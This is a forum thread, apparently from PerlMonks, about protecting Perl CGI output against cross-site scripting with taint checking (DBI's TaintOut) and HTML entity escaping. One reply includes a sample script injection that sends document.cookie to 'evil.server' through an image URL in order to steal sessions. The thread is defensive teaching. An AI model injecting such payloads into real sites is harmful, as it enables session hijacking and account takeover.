Re: Back to acceptable untainted characters

Just to add my Ł0.02 to the excellent points raised already in this post, the other big issue you'll have when writing HTML from CGIs is avoiding Cross Site Scripting attacks (XSS).

Basically, most sites require users to log in via a form, and they then get given a cookie containing some form of session-id or authenticator, which allows the site to verify that they have successfully authenticated from then on.

So, if someone inserts some code like

<script language="JavaScript">
document.write("<img src='http://evil.server/'+document.cookie+'.jpg'>
+);
</script>
[download]

into one of your foems, and this gets rendered onto a page, then anyone who looks at this page on the site will download the image from evil.server, and give evil.server their cookie. The server can then be configured to, for example, do a http request to the password changing page and assign you a new password, or anything else that the site allows.

Your best bet when displaying HTML is to taint anything from the database that could contain a string (see the Taint module on CPAN, or use the TaintOut => 1 arcument to DBI->connect to taint everything you read from the database automatically). This prevents you from accidentally forgetting to escape a string you meant to. Then, set up a regex to replace ' with ' < with < and so on. This will prevent such nasties from actually running.

Comment on Re: Back to acceptable untainted characters Select or Download Code

Replies are listed 'Best First'.
Re: Back to acceptable untainted characters by jonadab (Parson) on Sep 09, 2003 at 02:39 UTC
use the TaintOut => 1 argument to DBI->connect ++ Very cool thing that is, indeed. Put that in my dbconn subroutine, plus what I already have in my input-getting function, and I don't have to worry so much about forgetting to mark something as tainted. I still have to remember to encode entities on untrusted data going to the browser, though. `$;=sub{$/};@;=map{my($a,$b)=($_,$;);$;=sub{$a.$b->()}} split//,".rekcah lreP rehtona tsuJ";$\=$ ;->();print$/` [download]	[reply] [d/l]

Replies are listed 'Best First'.

Re: Back to acceptable untainted characters
by jonadab (Parson) on Sep 09, 2003 at 02:39 UTC

use the TaintOut => 1 argument to DBI->connect

++ Very cool thing that is, indeed. Put that in my dbconn subroutine, plus what I already have in my input-getting function, and I don't have to worry so much about forgetting to mark something as tainted.

I still have to remember to encode entities on untrusted data going to the browser, though.

$;=sub{$/};@;=map{my($a,$b)=($_,$;);$;=sub{$a.$b->()}}
split//,".rekcah lreP rehtona tsuJ";$\=$ ;->();print$/
[download]

[reply]
[d/l]